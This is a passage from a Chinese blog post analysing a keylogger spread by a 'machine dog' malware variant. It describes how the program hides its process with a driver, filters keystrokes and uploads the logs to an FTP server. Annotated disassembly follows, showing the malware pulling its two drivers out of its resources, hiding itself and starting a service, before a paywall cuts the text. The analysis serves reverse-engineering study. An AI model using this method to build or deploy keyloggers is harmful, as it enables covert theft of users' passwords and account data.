逆向一个基于驱动的恶意程序

最新推荐文章于 2023-12-01 15:35:25 发布
VIP文章 最新推荐文章于 2023-12-01 15:35:25 发布
阅读量2.4k 收藏
点赞数
分类专栏: 病毒汇编和调试逆向技术加脱壳 文章标签: object 汇编 struct c resources user
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iiprogram/article/details/2295675
版权
本程序发现于机器狗变种病毒释放恶意程序的下载列表中:穿透还原系统后的机器狗病毒在
机器启动后会从指定网址下载多个恶意程序,本程序即其中之一,其功能为通过底层键盘过滤
方式盗取用户键盘输入信息。因程序使用了底层键盘过滤技术,故而可记录大部分软件的键盘
输入,包括网游、QQ、邮箱的帐户输入信息等。
 
一、原理:
 
    此程序随系统进程internat.exe启动而被执行,程序通过加载自身资源里的两个驱动来隐
藏自身进程并截获键盘输入;通过自身线程与前端窗口线程输入绑定来监视窗口句柄及控件焦
点的变化情况,如发现变化则向驱动请求键盘输入扫描码数据,并对得到的扫描数据做解码、
加密、存盘操作;每隔50分钟程序会将按键记录文件上传到指定ftp服务器。
 
二、说明:
 
    1、本文提供的逆向代码均可编译,为调试方便,主程序逆向的C代码去除了定时上传和记
录加密部分(保留汇编代码注释),本地生成的记录文件改随机文件名为当前目录固定文件
名:kblog.txt;
    2、使用OD跟踪可以很容易的从资源中分离出的两个驱动:msdtx.sys和kdbrv.sys。(附件
下载)   msdtx.sys用于自身进程隐藏,经分析其采用的是fuzen开源代码(附件下载),本文不
做讨论。kbdrv.sys为键盘过滤驱动,本文给出其基本流程,并给出IDA反汇编代码的详细注
释。(附件下载)
    3、驱动逆向以hexrays生成的伪代码为中心,尝试以最少的改动来实现伪代码(附件下载)
的编译;
    4、主程序逆向的C代码(见KBLOG_C目录)使用的编译环境为VC6.0,通过此编译环境对驱动
的替换可以验证逆向出来的驱动代码是否正确。
 
三、流程
 
主程序kblog.exe基本流程:
 
1、释放、加载、启动隐藏自身进程的驱动。
2、释放、加载、启动键盘过滤驱动服务。
3、绑定自身线程输入到前端窗口线程输入。
4、监视前端窗口句柄和当前焦点控件句柄。
   如有变化,则向驱动请求数据,并保存数据。
5、每隔50分钟向指定ftp上传加密过的键盘记录。
 
说明:
 
    1、在没有安装过还原系统的机器上重复运行此程序会导致蓝屏,这是因为加载的驱动没有
做卸载处理、重复加载所致而对安装了还原系统的机器则不存在此问题,所以这种加载方式应
该是针对安装了还原系统的网吧设计。
    2、本地生成的记录文件名是随机的,上传到FTP的记录文件被重新命名,FTP目录
cert/cnt/中以数字文件名的形式设置了一个文件记数器,每次上传后此记数器加1,同时保存
到FTP中的文件名会以此记数器的当前数字来命名。记录文件上传后本地记录文件即被删除。
 
以下为主程序kblog.exe的代码注释:
 
------------------------------------------------------;主程序入口---------------------------
00401B39 >push    ebp
00401B3A  mov     ebp,esp
00401B3C  push    -1
00401B3E  push    00402681                            ;  SE 处理程序安装
00401B43  mov     eax,fs:[0]
00401B49  push    eax
00401B4A  mov     fs:[0],esp
00401B51  sub     esp,0AC0
00401B57  mov     dword ptr [ebp-AC4],0
00401B61  mov     dword ptr [ebp-6BC],0
00401B6B  mov     dword ptr [ebp-398],0
00401B75  mov     dword ptr [ebp-4A4],0
00401B7F  mov     dword ptr [ebp-5B0],0
00401B89  mov     dword ptr [ebp-218],0
00401B93  mov     dword ptr [ebp-5AC],0
------------------------------------------------------;  建立流文件对象--------------------------
00401B9D  push    1
00401B9F  lea     ecx,[ebp-84]
00401BA5  call    [<&MSVCIRT.fstream::fstream>]       ;  MSVCIRT.fstream::fstream
00401BAB  mov     dword ptr [ebp-4],0
00401BB2  push    1
00401BB4  lea     ecx,[ebp-380]
00401BBA  call    [<&MSVCIRT.fstream::fstream>]       ;  MSVCIRT.fstream::fstream
00401BC0  mov     byte ptr [ebp-4],1
-----------------------------------------------------------------------------------------------
00401BC4  mov     dword ptr [ebp-31C],004042D0        ;  ASCII "/kbdrv.sys" 键盘过滤驱动文件名
00401BCE  mov     dword ptr [ebp-20],004042DC         ;  ASCII "/msdtx.sys" 隐藏进程驱动文件名
00401BD5  mov     dword ptr [ebp-14],0
00401BDC  mov     dword ptr [ebp-38C],0
00401BE6  mov     dword ptr [ebp-39C],0
00401BF0  mov     dword ptr [ebp-10],0
00401BF7  call    004012B0                            ;  检测是否具备administrator权限
00401BFC  mov     [ebp-38C],eax
00401C02  cmp     dword ptr [ebp-38C],0
00401C09  jnz     short 00401C10                      ;  如具备权限则跳转
00401C0B  jmp     004023B0                            ;  否则返回(释放流文件对象并退出)
00401C10  push    0
00401C12  call    [<&KERNEL32.GetModuleHandleA>]      ;  KERNEL32.GetModuleHandleA
00401C18  mov     [ebp-18],eax
00401C1B  lea     eax,[ebp-49C]
------------------------------------------------------;  定位并加载隐藏进程的驱动文件--------------
00401C21  push    eax
00401C22  push    100
00401C27  call    [<&KERNEL32.GetCurrentDirectoryA>]  ;  KERNEL32.GetCurrentDirectoryA
00401C2D  mov     ecx,[ebp-20]
00401C30  push    ecx
00401C31  lea     edx,[ebp-49C]
00401C37  push    edx
00401C38  call    <jmp.&MSVCRT.strcat>                ;  带路径的驱动文件名
00401C3D  add     esp,8
00401C40  lea     eax,[ebp-49C]
00401C46  mov     [40455C],eax
00401C4B  push    004042E8                            ;  ASCII "sys"
00401C50  push    6A
00401C52  mov     ecx,[ebp-18]
00401C55  push    ecx                                 ; 
00401C56  call    [<&KERNEL32.FindResourceA>]         ;  KERNEL32.FindResourceA 在资源中定位
00401C5C  mov     [ebp-390],eax
00401C62  cmp     dword ptr [ebp-390],0               
00401C69  jnz     short 00401C70                      ;  如定位成功则跳转
00401C6B  jmp     004023B0                            ;  否则返回 
00401C70  mov     edx,[ebp-390]
00401C76  push    edx
00401C77  mov     eax,[ebp-18]
00401C7A  push    eax
00401C7B  call    [<&KERNEL32.LoadResource>]          ;  KERNEL32.LoadResource 加载至内存
00401C81  mov     [ebp-6B8],eax
00401C87  cmp     dword ptr [ebp-6B8],0
00401C8E  jnz     short 00401C95                      ;  如加载成功则跳转
00401C90  jmp     004023B0                            ;  否则返回
------------------------------------------------------;  生成驱动文件msdtx.sys(用于隐藏自身进程)-------
00401C95  mov     ecx,[ebp-6B8]
00401C9B  push    ecx
00401C9C  call    [<&KERNEL32.LockResource>]          ;  KERNEL32.SetHandleCount 设置可用句柄
00401CA2  mov     [ebp-1C],eax
00401CA5  cmp     dword ptr [ebp-1C],0
00401CA9  jnz     short 00401CB0                      ;  如设置成功则跳转
00401CAB  jmp     004023B0                            ;  否则返回
00401CB0  mov     edx,[ebp-390]
00401CB6  push    edx
00401CB7  mov     eax,[ebp-18]
00401CBA  push    eax
00401CBB  call    [<&KERNEL32.SizeofResource>]        ;  KERNEL32.SizeofResource 资源尺寸
00401CC1  mov     [ebp-4A0],eax
00401CC7  mov     ecx,[<&MSVCIRT.filebuf::openprot>]  ;  MSVCIRT.filebuf::openprot
00401CCD  mov     edx,[ecx]
00401CCF  push    edx
00401CD0  push    8A
00401CD5  mov     eax,[40455C]
00401CDA  push    eax
00401CDB  lea     ecx,[ebp-380]
00401CE1  call    [<&MSVCIRT.fstream::open>]          ;  打开用于建立文件
00401CE7  mov     ecx,[ebp-380]
00401CED  mov     edx,[ecx+4]
00401CF0  lea     ecx,[ebp+edx-380]
00401CF7  call    [<&MSVCIRT.ios::fail>]              ;  MSVCIRT.ios::fail 
00401CFD  test    eax,eax
00401CFF  je      short 00401D06                      ;  如打开成功 则跳转
00401D01  jmp     004023B0                            ;  否则返回
00401D06  mov     eax,[ebp-4A0]
00401D0C  push    eax
00401D0D  mov     ecx,[ebp-1C]
00401D10  push    ecx
00401D11  lea     ecx,[ebp-374]
00401D17  call    [<&MSVCIRT.ostream::write>]         ;  MSVCIRT.ostream::write 写入文件
00401D1D  lea     ecx,[ebp-380]
00401D23  call    [<&MSVCIRT.fstream::close>]         ;  MSVCIRT.fstream::close 关闭文件
------------------------------------------------------;  初始化驱动并隐藏自身进程----------------
00401D29  call    004023F1                            ;  初始化驱动
00401D2E  cmp     eax,-1
00401D31  jnz     short 00401D45                      ;  初始化成功则跳转
00401D33  mov     edx,[40455C]                        ;  否则删除驱动文件并返回
00401D39  push    edx
00401D3A  call    [<&KERNEL32.DeleteFileA>]           ;  KERNEL32.DeleteFileA
00401D40  jmp     004023B0
00401D45  call    [<&MSVCRT._getpid>]                 ;  MSVCRT._getpid 得到自身进程PID
00401D4B  mov     [ebp-384],eax
00401D51  mov     eax,[ebp-384]
00401D57  push    eax
00401D58  call    004025A3                            ;  隐藏自身进程 
00401D5D  add     esp,4
00401D60  mov     [ebp-6B4],eax
00401D66  cmp     dword ptr [ebp-6B4],0
00401D6D  jnz     short 00401D81                      ;  隐藏成功则跳转
00401D6F  mov     ecx,[40455C]                        ;  否则删除文件并返回
00401D75  push    ecx
00401D76  call    [<&KERNEL32.DeleteFileA>]           ;  KERNEL32.DeleteFileA
00401D7C  jmp     004023B0
00401D81  mov     edx,[40455C]
00401D87  push    edx                                 ; 
00401D88  call    [<&KERNEL32.DeleteFileA>]           ;  KERNEL32.DeleteFileA
------------------------------------------------------;  定位并加载键盘过滤的驱动文件--------------
00401D8E  lea     eax,[ebp-49C]
00401D94  push    eax
00401D95  push    100
00401D9A  call    [<&KERNEL32.GetCurrentDirectoryA>]  ;  KERNEL32.GetCurrentDirectoryA
00401DA0  mov     ecx,[ebp-31C]
00401DA6  push    ecx
00401DA7  lea     edx,[ebp-49C]
00401DAD  push    edx
00401DAE  call    <jmp.&MSVCRT.strcat>                ;  带路径的驱动文件名
00401DB3  add     esp,8
00401DB6  lea     eax,[ebp-49C]
00401DBC  mov     [40455C],eax
00401DC1  push    004042EC                            ;  ASCII "sys"
00401DC6  push    69
00401DC8  mov     ecx,[ebp-18]
00401DCB  push    ecx
00401DCC  call    [<&KERNEL32.FindResourceA>]         ;  KERNEL32.FindResourceA 定位
00401DD2  mov     [ebp-390],eax
00401DD8  cmp     dword ptr [ebp-390],0
00401DDF  jnz     short 00401DE6                      ;  如定位成功则跳转
00401DE1  jmp     004023B0                            ;  否则返回
00401DE6  mov     edx,[ebp-390]
00401DEC  push    edx
00401DED  mov     eax,[ebp-18]
00401DF0  push    eax
00401DF1  call    [<&KERNEL32.LoadResource>]          ;  KERNEL32.LoadResource 加载至内存
00401DF7  mov     [ebp-6B8],eax
00401DFD  cmp     dword ptr [ebp-6B8],0
00401E04  jnz     short 00401E0B                      ;  如加载成功则跳转
00401E06  jmp     004023B0                            ;  否则返回 
------------------------------------------------------;  生成驱动文件kbdrv.sys(用于键盘过滤)--------------
00401E0B  mov     ecx,[ebp-6B8]
00401E11  push    ecx
00401E12  call    [<&KERNEL32.LockResource>]          ;  KERNEL32.SetHandleCount 设置可用句柄
00401E18  mov     [ebp-1C],eax
00401E1B  cmp     dword ptr [ebp-1C],0
00401E1F  jnz     short 00401E26                      ;  如设置成功则跳转
00401E21  jmp     004023B0                            ;  否则返回 
00401E26  mov     edx,[ebp-390]
00401E2C  push    edx
00401E2D  mov     eax,[ebp-18]
00401E30  push    eax
00401E31  call    [<&KERNEL32.SizeofResource>]        ;  KERNEL32.SizeofResource 资源尺寸
00401E37  mov     [ebp-4A0],eax
00401E3D  mov     ecx,[<&MSVCIRT.filebuf::openprot>]  ;  MSVCIRT.filebuf::openprot
00401E43  mov     edx,[ecx]
00401E45  push    edx
00401E46  push    8A
00401E4B  mov     eax,[40455C]
00401E50  push    eax
00401E51  lea     ecx,[ebp-380]
00401E57  call    [<&MSVCIRT.fstream::open>]          ;  打开用于建立文件
00401E5D  mov     ecx,[ebp-380]
00401E63  mov     edx,[ecx+4]
00401E66  lea     ecx,[ebp+edx-380]
00401E6D  call    [<&MSVCIRT.ios::fail>]              ;  MSVCIRT.ios::fail
00401E73  test    eax,eax
00401E75  je      short 00401E7C                      ;  如打开成功 则跳转
00401E77  jmp     004023B0                            ;  否则返回 
00401E7C  mov     eax,[ebp-4A0]
00401E82  push    eax
00401E83  mov     ecx,[ebp-1C]
00401E86  push    ecx
00401E87  lea     ecx,[ebp-374]
00401E8D  call    [<&MSVCIRT.ostream::write>]         ;  MSVCIRT.ostream::write 写入文件
00401E93  lea     ecx,[ebp-380] 
00401E99  call    [<&MSVCIRT.fstream::close>]         ;  MSVCIRT.fstream::close 关闭文件
------------------------------------------------------;  安装并启动服务----------------------------
00401E9F  push    0F003F
00401EA4  push    0
00401EA6  push    0
0040
最低0.47元/天 解锁文章
iiprogram
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
郁金香游戏逆向-利用驱动保护自己的进程
07-05
郁金香逆向->C,C++,lua,汇编,逆向,驱动,加密解密
逆向分析 工具、加壳、安全防护篇
有勇气的牛排博客
09-16 7946
逆向分析 工具、加壳、安全防护篇
对未知的EXE文件进行逆向分析
m0_62821046的博客
10-31 1074
EXE文件使用VC++进行编译,使用OD使程序结束循环
墨者学院-逆向分析实训-exe(第1题)
JimWu的博客
09-05 927
逆向分析实训-exe(第1题) 难易程度:★★ 题目类型:代码审计 使用工具:FireFox浏览器、OD 1.打开靶场,下载文件。 2.解压文件,得到一个game.exe的应用程序。 3.我们从网上下载OD软件,把game文件拖进去分析。 4.通过分析,我们发现了可疑的ASCII,然后我们在这个循环的末尾,选择断点运行。 5.在寄存器中就能找到key is 0c28c5b42e05c4cd6fe...
逆向基础-Windows驱动开发(一)
AppWhite_Star的博客
07-31 820
驱动开发
CTF-REVERSE练习之逆向初探
bdfcfff77fa的博客
07-26 2324
逆向是指通过反汇编和调试等一些手段及工具,分析计算机程序的二进制可执行代码,从而获得程序的算法细节和实现原理的技术。不仅如此,逆向技能在信息安全面向的具体工作,如恶意代码分析、软件漏洞挖掘、移动安全以及对软件的破解方面发挥着巨大的作用。前面介绍过CTF的web真题,那今天我们从CTF中选择一个REVERSE题型来讲解。
IDA pro逆向工具的使用以及逆向分析程序实例操作
04-18
6.附带4个解密案例程序,包括三个exe文件和一个linux程序的逆向实操 环境: IDA pro7.6, linux, vc++ 适合人群: 具备一定编程基础,作业时间不够的学生,ida初学者 阅读建议: IDA pro逆向工具的初步入门,此...
论文研究-一种基于逆向程序流的程序切片算法.pdf
07-22
了一种基于程序逆向流的切片算法,它事先建立逆向程序流,再从切片点开始沿逆向程序流扫描程序以获得程序切片,只计算与切片相关的数据依赖,从而提高了切片计算的时空效率。通过实验发现该算法具有一定的可行性...
一款 .NET 程序逆向工具
11-14
dnSpy 是一款针对 .NET 程序的逆向工程工具。该项目包含了反编译器,调试器和汇编编辑器等功能组件,而且可以通过自己编写...该项目使用 dnlib读取和写入程序集,以便处理有混淆代码的程序(比如恶意程序)而不会崩溃
x64dbg程序逆向汇编修改神器
07-12
程序逆向汇编修改神器,免费开源x64/x32位动态调试器,适用Windows的专业程序调试器,软件支持中文界面和插件,界面及操作方法与OllyDbg调试工具类似,支持类似C表达式解析器、DLL和EXE文件调试、IDA式的跳跃箭头...
基于内核驱动的恶意代码动态检测技术
04-07
基于内核驱动的恶意代码动态检测技术,基于内核驱动的恶意代码动态检测技术
auto专杀.rar
12-10
auto专杀.rar 很好用 大家用用吧
恶意驱动修复工具
09-24
恶意驱动修复工具
中职网络安全比赛逆向入门教程(2)\\exe程序静态与动态分析,汇编nop覆盖
Ba1_Ma0的博客
04-07 2758
简介 我在ctf比赛平台找到一个适合入门的题目,和这次中职比赛逆向的项目差不多,做题的套路都差不多,可以帮助大家快速入门简单的逆向有不会的可以加我qq来问我,需要这个小程序可以加我qq:3316735898,我会给你文件和工具 这次是简单的动态与静态调试,还会涉及到nop滑梯破解程序 动态调试 1.对靶机服务器场景桌面上的PE01.exe二进制文件进行静态调试,将main函数的入口地址作为Flag值提交; 由于题目叫我们是静态调试,但我还是想教大家一些动态调试的基础,将程序拖入Ollydbg 右击,选
逆向exe
最新发布
记录生命的轨迹
12-01 835
逆向分析
逆向分析exe之Ollydbg使用教程
xinyue9966的博客
03-07 2487
现在随便输入 显示序列号不对 调试方法 打断点 然后开始运行exe程序 完成使用过程 进而判断处显示密码 至于F2重新运行、F7按步骤运行使用方法一样 暴力破解方法 那么我们放入Ollydbg中查看 jnz是判断语句 判断是否等于值,我们逆向破解时候可以把它设置为空值,进而能够成功实现我们的功能 此时我们可以右键 二进制编辑成NOP 值为90 90或者二进制填充NOP 右键 复制到可执行性程序 此时观看到排列布置乱,将任意框最大化即可复原 在其中右键保存到文件 再次输入到新保存文件中 ...
初学驱动逆向,笔记一。
Diomedes's Place
12-19 1765
初学驱动逆向,在《windows驱动开发技术详解》中随便找个例子逆逆看 [ \chapter09\SpecialStartIOTest ]。 水平很菜,各路牛人笑过。 逆向该例子的DriverEntry和CreateDevice函数,这两个函数在《windows驱动开发技术详解》的例子中十分常见。 并逆向的本范例驱动的核心部分 HelloDDKRead 函数,没什么技术含量。 经验:需要熟
pyinstaller打包exe免杀和逆向浅析
crowsec
01-27 6526
本文主要对pyinstaller打包的文件进行了超简单逆向分析,在这里也有一些免杀的小小的tips,其中也参考了诸多的资料,不乏有诸多错误,希望各位师傅能够批评指正。
e3.exe的逆向分析
qq_40756661的博客
11-14 432
e3.exe的逆向分析 运行截图 逆向思路 提示如下: 使用IDR加载Delphi程序,导Map文件,将Map文件导入OD。 使用Delphi逆向工具Darkde4 可以看到,Panel1有两个方法,单击和双击,是一个按钮 FromCreate 窗体的创建事件 chkcode 校验代码 KeyUp 响应的键盘的弹起 DbClick 按钮的双击事件 Click 按钮的单击事件 通过1得到了几个事件的RVA,接下来进行分析,首先
hooker是一个基于frida实现的逆向工具包
07-07
hooker是一个基于frida实现的逆向工具包。顾名思义,它的主要功能是在逆向工程中使用hooking技术。 frida是一款功能强大的动态代码注入和调试工具,可以用于逆向工程、漏洞研究、代码调试等。而hooker则是在frida的基础上开发的一个工具包,主要用于在逆向工程过程中进行函数的hook操作。 通过hooker,我们可以在目标应用程序的运行过程中,拦截并修改指定函数的行为,实现对函数的动态修改。这对于逆向工程和安全研究来说,非常有价值。比如,我们可以通过hooker来绕过一些应用程序的验证机制,修改程序运行时的行为,甚至可以实时地获取应用程序的敏感信息。 使用hooker的过程相对简单,首先需要安装frida工具和frida-python库,然后引入hooker工具包。接下来,我们可以使用hooker提供的API来选择目标应用程序、指定需要hook的函数,并自定义函数的行为。 总的来说,hooker作为一个基于frida的逆向工具包,提供了方便且功能强大的hooking工具,可以帮助研究人员更好地进行逆向工程。它的现使得逆向工程变得更加高效和灵活,有助于发现安全漏洞、分析恶意软件、加密算法研究等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值